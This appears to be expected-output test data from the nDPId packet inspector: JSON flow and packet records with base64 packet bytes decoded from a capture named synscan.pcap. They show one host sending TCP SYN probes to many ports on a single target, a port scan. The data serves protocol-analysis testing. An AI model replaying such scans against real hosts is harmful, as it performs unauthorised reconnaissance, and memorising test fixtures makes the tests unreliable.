+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":590,"source":"synscan.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"synscan.pcap","alias":"nDPId-test","flow_id":582,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsQjcAACgG3jusEAAIQA2GNIzSF9rdUoMYAAAAAGACBAActQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":591,"source":"synscan.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":591,"source":"synscan.pcap","alias":"nDPId-test","flow_id":583,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAs9woAADcGGmisEAAIQA2GNIzSHCHdUoMYAAAAAGACEAAMbgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":592,"source":"synscan.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1053,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":592,"source":"synscan.pcap","alias":"nDPId-test","flow_id":584,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/ToAADsGEDisEAAIQA2GNIzSBB3dUoMYAAAAAGACEAAkcgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"synscan.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32774,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"synscan.pcap","alias":"nDPId-test","flow_id":585,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsrgcAACoGcGusEAAIQA2GNIzSgAbdUoMYAAAAAGACDACsiAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":594,"source":"synscan.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":594,"source":"synscan.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsKF4AAC0G8xSsEAAIQA2GNIzSC7bdUoMYAAAAAGACCAAk2QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"synscan.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"synscan.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAszEUAADsGQS2sEAAIQA2GNIzSB\/\/dUoMYAAAAAGACEAAgkAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":596,"source":"synscan.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"synscan.pcap","alias":"nDPId-test","flow_id":588,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsezgAADMGmjqsEAAIQA2GNIzSIAjdUoMYAAAAAGACEAAIhwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"synscan.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"synscan.pcap","alias":"nDPId-test","flow_id":589,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAswn0AACsGWvWsEAAIQA2GNIzSA3jdUoMYAAAAAGACEAAlFwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":598,"source":"synscan.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34572,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":598,"source":"synscan.pcap","alias":"nDPId-test","flow_id":590,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAso9kAAC8GdZmsEAAIQA2GNIzShwzdUoMYAAAAAGACEAChggAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":599,"source":"synscan.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":599,"source":"synscan.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsUnoAACcGzvisEAAIQA2GNIzSBLHdUoMYAAAAAGACEAAj3gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":600,"source":"synscan.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"synscan.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAs7YEAADYGJPGsEAAIQA2GNIzSIyvdUoMYAAAAAGACDAAJZAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":601,"source":"synscan.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"synscan.pcap","alias":"nDPId-test","flow_id":593,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsph0AACwGdlWsEAAIQA2GNIzSDSfdUoMYAAAAAGACBAAnaAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":602,"source":"synscan.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2196,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":602,"source":"synscan.pcap","alias":"nDPId-test","flow_id":594,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsJeMAADAG8o+sEAAIQA2GNIzSCJTdUoMYAAAAAGACBAAr+wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":603,"source":"synscan.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"synscan.pcap","alias":"nDPId-test","flow_id":595,"flow_packet_id":1,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059410,"pkt":"ACYLMQczACWzv5HuCABFAAAsyUAAADAGTzKsEAAIQA2GNIzSCEndUoMYAAAAAGACBAAsRgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":604,"source":"synscan.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059411,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5850,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"synscan.pcap","alias":"nDPId-test","flow_id":596,"flow_packet_id":1,"flow_last_seen":1278275059411,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059411,"pkt":"ACYLMQczACWzv5HuCABFAAAsBxkAACgGGVqsEAAIQA2GNIzSFtrdUoMYAAAAAGACBAAdtQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":605,"source":"synscan.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059411,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"synscan.pcap","alias":"nDPId-test","flow_id":597,"flow_packet_id":1,"flow_last_seen":1278275059411,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059411,"pkt":"ACYLMQczACWzv5HuCABFAAAs6FYAADkGJxysEAAIQA2GNIzSHVjdUoMYAAAAAGACCAATNwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":606,"source":"synscan.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059411,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1096,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"synscan.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":1,"flow_last_seen":1278275059411,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059411,"pkt":"ACYLMQczACWzv5HuCABFAAAsEFQAADgGAB+sEAAIQA2GNIzSBEjdUoMYAAAAAGACBAAwRwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"synscan.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9220,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"synscan.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAso8IAACoGerCsEAAIQA2GNIzTJATdU4MZAAAAAGACDAAIiAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":608,"source":"synscan.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1169,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"synscan.pcap","alias":"nDPId-test","flow_id":600,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsKpQAADUG6N6sEAAIQA2GNIzTBJHdU4MZAAAAAGACCAAr+wAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":609,"source":"synscan.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"synscan.pcap","alias":"nDPId-test","flow_id":601,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsqggAADYGaGqsEAAIQA2GNIzTKUbdU4MZAAAAAGACDAADRgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":610,"source":"synscan.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1761,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":610,"source":"synscan.pcap","alias":"nDPId-test","flow_id":602,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsvOQAACoGYY6sEAAIQA2GNIzTBuHdU4MZAAAAAGACDAAlqwAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"synscan.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"synscan.pcap","alias":"nDPId-test","flow_id":603,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsFNoAADYG\/ZisEAAIQA2GNIzTAAPdU4MZAAAAAGACDAAsiQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":612,"source":"synscan.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":612,"source":"synscan.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsbKEAAC8GrNGsEAAIQA2GNIzTBSrdU4MZAAAAAGACEAAjYgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":613,"source":"synscan.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"synscan.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":1,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059455,"pkt":"ACYLMQczACWzv5HuCABFAAAsohQAACYGgF6sEAAIQA2GNIzTIAHdU4MZAAAAAGACDAAMiwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":614,"source":"synscan.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059455,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 